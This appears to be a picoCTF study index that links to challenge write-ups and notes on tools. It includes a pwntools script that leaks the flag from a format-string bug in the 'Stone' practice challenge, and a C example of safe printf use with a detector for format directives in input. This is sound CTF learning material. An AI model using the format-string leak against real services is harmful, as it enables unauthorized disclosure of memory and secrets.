# picoCTF from Zero (RE0:picoCTF)

[TOC]

----------------------------------------------------------------------------

## Remember `ls -la`

Files are sometimes hidden; only this command shows everything inside a directory.

## picoCTF2025

[picoCTF2025 Write-up](/A1dVPyT1SPG6hxXwXjbtlg)

## picoCTF2024

[picoCTF notes](https://hackmd.io/e8XhkWRhQZKdX1DP5shufw)

## [picoCTF2023](https://play.picoctf.org/practice?originalEvent=72&page=1)

Skipping challenges with less than 50% likes for now; they're poison QQ (2023/04/07)

### General Skills
- [chrono-100pt](https://hackmd.io/Aq1KwKm8ScOjhK6tr_AGRQ?both)
- [money-ware-100pt](https://hackmd.io/Rj_XJPKSR4GIureej8jofQ?both)
- [Permissions-100pt](https://hackmd.io/dGmg8Vi0TJ262w-k8jUbbA?both)
- [repetitions-100pt](https://hackmd.io/4kq0tqzFTg2U2d1rOQUqxw?both)

### Web Exploitation
- [MatchTheRegex-100pt](https://hackmd.io/RM7lQP1DR2iEC3sE408JOQ?both)
- [findme-100pt](https://hackmd.io/KtISCxZ6T-aRv7_WmtxscQ?both)

### Cryptography
- [ReadMyCert-100pt](/GxO-p5BTQxqX_0eCnUesIA)
- [rotation-100pt](/xu7UOJrySzmFhsJYpeWPMg?both)

### Forensics
- [PcapPoisoning-100pt](/BIEqiOoBTlKg47bepmWz4A?both)
- [hideme-100pt](/ndljMjYUTK-e0NzV05BI2A)
- [who is it-100pt](/MHQlxF-9SoifemgqchvYjQ?both)

### Reverse Engineering
- [Reverse-100pt](/R4zubXeGSR-DKEiE7_dImQ?both)
- [Safe Opener2-100pt](/KH36Brt2TrioCOKpNPZIyA?both)

### Binary Exploitation
- [two-sum-100pt](/DuYD4ufhSW-nXEk8WL1KXw?both)
- [hijacking-200pt](/3O3l6RGIQIm42UkDWyQ7Rg?both)

----------------------------------------------------------------------------

## [picoCTF2022](https://play.picoctf.org/practice?originalEvent=70&page=1)

Starting a new series (2023/04/11)

### Binary Exploitation
- [basic-file-exploit-100pt](/O2pZFhx1QhWj8QFHD8Eycw?both)
- [buffer overflow 0-100pt](/uqa2wMikRCGisY8rbMZzFw?both)
- [CVE-XXXX-XXXX-100pt](/WNujkM4DSWWBs2bBBY812g?both)
- [RPS-200pt](https://hackmd.io/1M7pwnVUS16BcOf9SKfZYg?both)
- [Bbbbloat-300pt](https://hackmd.io/wQcoVPFwT5ii-Hgt7Gdxeg?both)
- [buffer overflow 1-200pt](https://hackmd.io/nYGsjMrASxmsxshWwrPhLA?both)
- [x-sixty-what-200pt](https://hackmd.io/bmQWspprRIWrzGDu1n46Sw?both)
- [buffer overflow 2-300pt](https://hackmd.io/9dbnF9YZR42g2vmtirs3pA?both)

### Cryptography
- [basic-mod1-100pt](/ZTzcpAM3TpyD6Ppx-aWqVw?both)
- [basic-mod2-100pt](/ptziC8e_R8ioFgVBUNW0Lg?both)
- [credstuff-100pt](/3rKQto_OQoaBlF7gNC-xmQ?both)
- [morse-code-100pt](/KyngQdL_Qbu_wFHBxz5PtA?both)
- [rail-fence-100pt](https://hackmd.io/RQdoYaOsSuCXqKeDpvQdjQ?both)
- [substitution0-100pt](https://hackmd.io/iJKQgUcPRWGh2oggrjMTig?both)
- [substitution1-100pt](/uwB2shRlSOq-7ljzuQ79lg)
- [substitution2-100pt](https://hackmd.io/XCG50bH7SduWLCCbo9w63A?both)
- [transposition-trial-100pt](https://hackmd.io/JweW0nNiTDufwuM6Fn1qKQ?both)
- [Vigenere-100pt](https://hackmd.io/I3tIjfL4R8eWV45ye6Ezmw?both)

### Web Exploitation
- [Includes-100pt](https://hackmd.io/yNdXio9RSIuobzW9hbuKxg?both)
- [Inspect HTML-100pt](https://hackmd.io/wyn1mOV7SnK-1nS30iA4mA?both)
- [Local Authority-100pt](https://hackmd.io/mSdhDNpfQVOMBLUmACetlw?both)
- [Search source-100pt](https://hackmd.io/biHGab1OSamUzlTgkAgCmw?both)
- [Forbidden Paths-200pt](https://hackmd.io/7BQ9ATQXQvKPzI19KA8Dww?both)
- [Power Cookie-200pt](https://hackmd.io/7h2MzDIzTRGumgIC8RMcew?both)
- [Roboto Sans-200pt](https://hackmd.io/TasQSrpVT_msWb6BshNp5Q?both)
- [secret-200pt](https://hackmd.io/Qqu1vj4kRAO44mc6cRsUnw?both)
- [SQL Direct-200pt](https://hackmd.io/Zt9dXtACQsOB2txaUYn0ng?both)

### Forensics
- [Enhance!-100pt](/5GZMNlboTPyAipu_UKMGHw?both)
- [File types-100pt](/4UZRnyrbRr-tCdKKtC-vWQ?both)
- [Lookey here-100pt](/Vh1CYmDtSNuzDIG6XQCDdQ?both)
- [Packers Primer-100pt](/qoDj6KuZSESO9kMRDbvQvQ?both)
- [Redaction gone wrong-100pt](https://hackmd.io/dMe6_sRPSZyXuXx-dkx49g?both)
- [Sleuthkit Intro-100pt](https://hackmd.io/fyVUTrnRQh2teToZCePzpg?both)
- [Sleuthkit Apprentice-200pt](https://hackmd.io/hVCMP9lTReKU_B_3uzCx_A?both)
- [Eavesdrop-300pt](https://hackmd.io/WYdOQ0E6RDuwyJh8IBevqQ)

### Reverse Engineering
- [file-run1-100pt](/19NV8pSiQM6J0Tl5crcbow?both)
- [file-run2-100pt](/Mpnfs1ZnQmqTSEYN7JBpXA)
- [GDB Test Drive-100pt](/BeaLn_FtRWGRAfmnDa9_7w?both)
- [patchme.py-100pt](/tEDc2CrsQKCMTXMI6RA_JQ?both)
- [Safe Opener-100pt](https://hackmd.io/SRHrzNQCSo6F2wrP4Xa5ow?both)
- [unpackme.py-100pt](https://hackmd.io/6N1twHjcRn2N1MIx191JAA?both)
- [bloat.py-200pt](https://hackmd.io/2dN8giXiSOqKBsQFQymR5A?both)
- [Fresh Java-200pt](https://hackmd.io/KENMf-mwRBG5KahMrCXaSw?both)

----------------------------------------------------------------------------

## [Beginner picoMini 2022](https://play.picoctf.org/practice?originalEvent=69&page=1)

Completed 2023/03/29

### General Skills
- [Codebook-100pt](/VDQzTvIcQlSObIiSfrFMQQ)
- [convertme.py-100pt](/6iBnLTbBQ3u8seu6pw9IGA?both)
- [fixme1.py-100pt](https://hackmd.io/iS05x-jVSlC6aIyTTTbH-A?both)
- [fixme2.py-100pt](https://hackmd.io/7A2O5g56Qqq1tQmBD-vUbA?both)
- [Glitch Cat-100pt](https://hackmd.io/CWfcD8f2Tzia93iSc8fGOQ?both)
- [PW Crack 1-100pt](https://hackmd.io/m5S4Qx1oR5eC0ZTCdBXqEQ?both)
- [PW Crack 2-100pt](https://hackmd.io/JzdYdFEBQ7Ck7_zE_RIExw?both)
- [PW Crack 3-100pt](https://hackmd.io/6inwqmEbQayrlwLRwUoZPg?both)
- [PW Crack 4-100pt](https://hackmd.io/aXXUYHupTD-nS2rtRl32dw?both)
- [PW Crack 5-100pt](https://hackmd.io/OOs4gU0nQLW4L56e0hYC4g?both)
- [runme.py-100pt](https://hackmd.io/eNeY9LwDRMSg0BaY1BCx_Q?both)
- [Serpentine-100pt](https://hackmd.io/Bd3NznP_ToSs7_Fd7VdFlw)

----------------------------------------------------------------------------

## [picoMini by redpwn](https://play.picoctf.org/practice?originalEvent=67&page=1)

So hard to solve, exhausting... how can the 100pt ones be this hard (2023/04/06)

### Web Exploitation
- [Login-100pt](/iA1FVV9YQ4uooPxOWYNykQ)
- [caas-150pt](/9L7-gnoBTUeFYuSuck9tLQ?both)

### Cryptography
- [spelling-quiz-100pt](/1BrQkuEVSgeysbTvq2pwUA)

----------------------------------------------------------------------------

## Useful tools

### Basic knowledge?
- [Some Linux commands](/8-UJ_6NYSVWHVYpMrsFBuw)
- [String splitting](/N_W7l6T2Qb68N8GkcX7irw)
- Crypto: [see this URL for installation](https://bobbyhadz.com/blog/python-no-module-named-crypto)

### Web tools
- wfuzz: `wfuzz [absolute path of wordlist] --hc [value to filter out] URL/FUZZ`. It seems to only work against http (to be confirmed).
- SecLists: has more dictionaries

### rev tools
- [java decompiler](http://www.javadecompilers.com/)
- Ghidra: decompiler

### Decoding
[Online decoder](https://the-x.cn/zh-cn/base64)

### Image handling
[Usage steps](/uzJvvVlXRjqSiry0qiHMJg)
- StegSolve: for solving (image) steganography, LSB (Least Significant Bit). How to launch the tool XD: `java -jar stegsolve.jar`. The tool looks like this: (screenshot)
- binwalk: [if you don't get it, read this](/ndljMjYUTK-e0NzV05BI2A). `binwalk -e [filename]`
- strings: reads the contents of binary files. `strings [filename] | grep "flagname"`
- exiftool: inspects the EXIF header of an image. `exiftool [filename]`
- foremost: separates embedded files from an image. `foremost filename.png`
- inkscape

### IP lookup
[Global Whois lookup](https://www.whois365.com/tw)

### Binary (pwn)
- GEF (GDB) [official site](https://hugsy.github.io/gef/). After installing per the official site, run `gdb ./filename`, as shown below (screenshot).
  - r (run): run the program
  - x function_name: only shows the function's memory address (endbr64)
  - disass function_name: lists every instruction in the function together with its memory address
  - pattern create 100: generates a 100-character pattern
  - pattern offset function_name: lists the memory address of the code inside the function
  - pattern search memory_address:
- pwntools install:

```shell
$ sudo apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
$ python3 -m pip install --upgrade pip
$ python3 -m pip install --upgrade pwntools
```

A simple pwn script, challenge: [Stone](https://play.picoctf.org/practice/challenge/105)

```python
from pwn import *

# connect to the challenge service
r = remote('mercury.picoctf.net', 59616)

# read the menu and choose option 1
print(r.recvuntil(b'2) View my portfolio\n').decode())
r.sendline(b'1')

# the "API token" is passed straight to printf(), so send format specifiers
print(r.recvuntil(b'What is your API token?\n').decode())
r.sendline(b'%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x')

print(r.recvline().decode())
s = r.recvline().decode()

# each leaked value is a 32-bit little-endian word of the stack; pack them back into bytes
l = s.split('-')
flag = b''
for u in l:
    u = int(u, base=16)
    flag += pack(u, 32, 'little')
print(flag)

r.close()
```

- Rambling

Generally, pwn is about exploiting a vulnerability in the challenge to get the flag. The challenges I have seen so far are written in C, and the most common vulnerabilities involve input/output, such as gets() and printf(). Normally printf() output is formatted as `printf("%d", name)`, but when the output format is left unrestricted, several `%x` or `%s` specifiers can be injected at input time, causing an overflow that prints data from other memory.

###### tags: [`從零開始的 picoCTF`](https://hackmd.io/-KQe DuzrQMOcFNhwU_5eKA?both=) `picoCTF`
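The printf() point above, as an added C example that is not part of the original note: the unsafe pattern is shown only as a comment, next to the safe form (a constant format string with the input passed as an argument), plus a small helper that counts format directives in untrusted input so a validator or log-review rule can flag probes like the one the Stone script sends. The function names `greet_safe` and `count_format_directives` and the sample input are made up for this example.

```c
/* Added example, not the note's own code. Names and sample input are made up. */
#include <stdio.h>
#include <string.h>

/* Unsafe pattern described in the note: the user's text becomes the format
 * string, so "%x-%x-%x" makes printf() read values off the stack.
 *
 *     void greet_unsafe(const char *name) { printf(name); }   // do not do this
 *
 * Safe pattern: the format string is a constant and the input is only an
 * argument, so "%x" inside the name is printed as the characters '%' 'x'.
 * snprintf bounds the write and returns the length the full output needs. */
int greet_safe(char *out, size_t out_len, const char *name)
{
    return snprintf(out, out_len, "Hello, %s!", name);
}

/* Count format directives in untrusted input. "%%" is an escaped percent
 * sign, not a directive, so it is skipped. A non-zero count on a field that
 * should be a plain name or token is worth rejecting or logging. */
int count_format_directives(const char *s)
{
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {      /* literal percent */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    char buf[128];
    const char *probe = "%x-%x-%x-%x";   /* constructed sample input */

    greet_safe(buf, sizeof buf, probe);
    printf("%s\n", buf);                 /* input is echoed literally */
    printf("directives in input: %d\n", count_format_directives(probe));
    return 0;
}
```

Compile with `-Wall -Wformat-security`: GCC and Clang warn on a `printf()` whose format string is not a literal, which is the quickest way to find this pattern during code review.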